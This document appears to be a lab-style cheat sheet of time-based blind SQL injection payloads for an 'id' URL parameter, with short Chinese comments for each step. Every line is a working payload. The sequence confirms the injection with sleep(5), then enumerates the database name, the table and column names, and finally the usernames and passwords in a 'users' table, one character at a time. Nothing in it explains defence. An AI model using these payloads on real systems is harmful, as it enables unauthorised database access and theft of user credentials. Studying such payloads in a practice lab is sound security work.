?id=1' and if(1=1,sleep(5),1)--+ 判断参数构造。 ?id=1'and if(length((select database()))>9,sleep(5),1)--+ 判断数据库名长度 ?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 逐一判断数据库字符 ?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 判断所有表名长度 ?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 逐一判断表名 ?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 判断所有字段名的长度 ?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 逐一判断字段名。 ?id=1'and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 判断字段内容长度 ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+ 逐一检测内容。
